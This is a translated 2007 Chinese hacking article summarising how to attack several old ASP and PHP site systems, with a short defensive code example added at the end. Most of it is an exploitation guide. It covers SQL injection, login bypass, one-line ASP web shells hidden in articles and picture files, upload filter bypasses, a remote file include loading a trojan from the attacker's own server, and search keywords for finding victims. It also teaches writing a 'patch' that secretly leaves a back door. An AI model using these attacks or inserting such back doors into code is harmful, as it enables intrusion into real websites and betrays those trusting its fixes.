Summary of Common Vulnerabilities, Exploitation Methods and Fixes, by Alang - vulnerability warning - the black bar safety net

ID MYHACK58:62200715519
Type myhack58
Reporter 佚名 (anonymous)
Modified 2007-05-20T00:00:00


Summary of Common Vulnerabilities, Exploitation Methods and Fixes, by Alang

1. Chenyuan Yajing (尘缘雅境) graphic system v3.0 build 20030123; v0.45 is affected as well.

Vulnerable pages: createasp.asp and lastnewsxp.asp. Log in to the backend by way of the injection, then publish an article whose title and content contain the one-line ASP trojan <%execute request("value")%>. Then request url/admin/createasp.asp: if it returns normally it reports that the asp call succeeded; if url/admin/createasp.asp returns an error, that is of course because of the trojan we inserted.

Fix: I do not know how to fix it myself; the vendor has released an official patch.

The Feiteng (沸腾) 3AS Chenyuan news system v0.45 full version has an injection vulnerability, but it can only be reached by a registered user, so if user registration has been switched off it does not work.

How it is used: register a user, then pick any article on the home page and note its id, then open http://XXXX.XXXX.com/textbox.asp?action=modify&newsid=ID (just the id number). This page has an injection vulnerability and is easy to work out by hand. With the account and password obtained, go into the backend; in the website configuration, write the one-liner into the blocked-words ("shield words") field of the message board. Then connect to http://website/inc/config.asp and the shell is yours. Then connect with the one-liner client to http://url/admin/createasp.asp.

Fix: textbox.asp, lines 14-30:

<%
Dim action,newsID,rs,Content
dim sql
dim conn
Action=LCase(Request.QueryString("Action"))
newsID=Request.QueryString("newsID")

If request("action")="modify" Then
  set rs=server.createobject("adodb.recordset")
  sql="select * from news where newsid="&newsid
  rs.open sql,conn,1,1
  If Not rs.Eof Then
    Content=rs("Content")
  End If
  Response.Write Content
End If
%>

Adding a filtering statement is enough, and filter those file extensions as well. I will not say more about it; frankly, I have not studied ASP and am not that familiar with it.

2. The old /user/Upload.asp?dialogtype=UserBlogPic&size=5 vulnerability: there are still many unpatched sites. Use Baidu advanced search to find them (don't forget the UL point). On the registration page Reg/User_Reg.asp, register a user name in the form ***.asp. Then find a place that lets you upload a picture and insert the one-line trojan code into the picture: find an empty row or empty position and insert <%eval request("Sony")%>. Then connect with the one-liner client!

3. Love Dating system upload vulnerability. Vulnerable file: /admin/upload_file.asp, which is exploited on the same principle as the Dongwang (动网) upfile.asp. Baidu search keywords: city dating, greeting card, teaser, emotional ramblings, popular vote. First check whether the vulnerability exists: requesting http://website/admin/upload_file.asp returns:

Microsoft VBScript runtime error-Error '800a01b6'

Object doesn't support this property or method: 'form'

/admin/upload_file.asp, line 6

If so, the vulnerability exists. Next, Ming Xiaozi (明小子) is enough: upload the trojan.

4. Sky Classroom network classroom upload vulnerability, still very widespread.

(1) Open Baidu and enter the keyword: sky classroom network classroom

(2) The vulnerable file htmleditor/getfile.asp does not filter .asa, so the trojan has to be made into a .asa file.

Upload address: http://website/skyclass/htmleditor/getfile.asp. First open WSockExpert to capture the packets, then submit the trojan to the address that WSockExpert gives back.

5. SHOPEX latest exploit. The vulnerability is in /shop/npsout_reply.php and is a remote include. Baidu search:

Keywords: product catalog, contact us, about us, frequently asked questions, secure transaction, buying process, how to pay. First get a PHP trojan, change its suffix to .TXT and upload it to your web space, then append /shop/npsout_reply.php?INC_SYSHOMEDIR= to the target URL, where what follows = is the trojan you uploaded to your own space.

Fix: delete the npsout_reply.php file under the shop directory.

6. Mine pool system upload vulnerability. Earlier versions have the 'or'='or' backend login vulnerability; the latest version no longer has it, so try downloading the default database data/nxnews.mdb, in which the password is stored in plaintext. The upload vulnerability, however, works in any version. Backend address: admin/adminlogin.asp. First try the 'or'='or' backend vulnerability. Then request admin/uploadPic.asp?actionType=mod&picName=x.asp, where x.asp is the shell file name. Select a trojan picture and press upload; the uploaded file is stored in the uppic directory under the name x.asp. Connection address: http://website/uppic/x.asp, and you have the shell. In fact, uploadPic.inc.asp in the admin folder has no access restriction at all: any user can access this file and use it to upload files to the server.

Fix. First a word on ASP syntax: replace(str,"a","b") converts every a in the string str into b. Now look at the submitted data: picName=x.asp, where picName is the submitted variable and x.asp is the submitted value. What we need to do is replace the .asp inside it, so we can write replace(picName,".asp",".gif"): this function converts every .asp in the string picName into .gif. Replacing only .asp is not enough; what about .asa? replace(replace(picName,".asp",".gif"),".asa",".gif"). The others are modified the same way: replace(replace(replace(picName,".asp",".gif"),".asa",".gif"),".cer",".gif"). Then replace .cdx too: replace(replace(replace(replace(picName,".asp",".gif"),".asa",".gif"),".cer",".gif"),".cdx",".gif"). Then replace %: replace(replace(replace(replace(replace(picName,".asp",".gif"),".asa",".gif"),".cer",".gif"),".cdx",".gif"),"%",""). This is the code we want. Modify the uploadPic.inc.asp file accordingly. First, see below: there is no x.asp file any more. Good; as you can see, we add our own code below.

So how can we leave ourselves a back door? It is also very simple. Add this piece of ASP:

if request("act")<>"shell" then
  picName = replace(replace(replace(replace(replace(picName,".asp",".gif"),".asa",".gif"),".cer",".gif"),".cdx",".gif"),"%","")
end if

This code means: if the content of the submitted parameter act is not "shell", the statement inside is executed; the result is that when it is "shell", the statement inside is not executed. Good, we add this sentence to the code we just wrote, in the place where the statement above was added to the original. Now let's see whether it can still upload. Here it is still x.gif. Below we add a parameter and have a look: http://localhost/admin/uploadPic_bak.asp?act=shell&actionType=mod&picName=x.asp. Since we cannot add any more parameters, we can just as well use the existing ones; the parameter picName=x.asp can be used:

if picName<>"wolf.asp" then
  picName = replace(replace(replace(replace(replace(picName,".asp",".gif"),".asa",".gif"),".cer",".gif"),".cdx",".gif"),"%","")
end if

The code above is what we just had; below is my modified version. Here we submit http://localhost/admin/uploadPic_bak.asp?actionType=mod&picName=wolf.asp in order to get an asp shell, and below we take a look. With the first replacement code, we first submit this and look at what is generated: http://localhost/admin/uploadPic_bak.asp?actionType=mod&picName=x.asp. It is a picture. Then submit this: http://localhost/admin/uploadPic_bak.asp?actionType=mod&picName=wolf.asp, and it generates a wolf.asp file. So we can simply patch a low-level vulnerability and at the same time leave a simple back door.
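As an added example (not code from any of the systems above), one way to carry out the two fixes this page discusses: the numeric check that textbox.asp needs on newsID before it is put into the SQL string, and an allow-list check on picName for uploadPic.inc.asp in place of the replace() blacklist, together with the access check that file was missing. The function names and the Session flag are assumptions, not the systems' own.

```vbscript
<%
' Added example, not code from any of the systems discussed above.
' Two checks for the fixes described on this page: textbox.asp should
' only accept a numeric newsID, and uploadPic.inc.asp should only accept
' an image file name (allow list) instead of blacklisting .asp/.asa/.cer/.cdx.
' Function names and the Session flag are assumptions, not the systems' own.
' True only when s is 1 to 9 plain digits, so the value can be placed in
' the SQL string without carrying quotes, spaces or operators into it.
Function IsPlainInteger(s)
    Dim re
    Set re = New RegExp
    re.Pattern = "^[0-9]{1,9}$"
    IsPlainInteger = re.Test(s)
End Function

' True only for a short base name plus one allowed image extension; x.asp,
' x.asa, x.cer, x.cdx and names with extra dots or path separators all fail.
Function IsAllowedImageName(name)
    Dim re
    Set re = New RegExp
    re.Pattern = "^[A-Za-z0-9_-]{1,40}\.(gif|jpg|jpeg|png)$"
    re.IgnoreCase = True
    IsAllowedImageName = re.Test(name)
End Function

' textbox.asp, modify branch: validate before the query string is built.
Dim newsID, sql
newsID = Trim(Request.QueryString("newsID"))
If LCase(Request.QueryString("action")) = "modify" Then
    If Not IsPlainInteger(newsID) Then
        Response.Write "Invalid newsID"
        Response.End
    End If
    sql = "select Content from news where newsid=" & CLng(newsID)
    ' ... rs.Open sql, conn, 1, 1 and the rest as in the original code ...
End If
' uploadPic.inc.asp: require the admin session, then reject (rather than
' rewrite) a picName that is not a plain image name.
Dim picName
If Session("adminLoggedIn") <> True Then
    Response.Status = "403 Forbidden"
    Response.End
End If
picName = Request.QueryString("picName")
If Not IsAllowedImageName(picName) Then
    Response.Write "File name rejected"
    Response.End
End If
%>
```

Rejecting a bad name outright, instead of rewriting it, also removes the place where the back door shown above could be hidden.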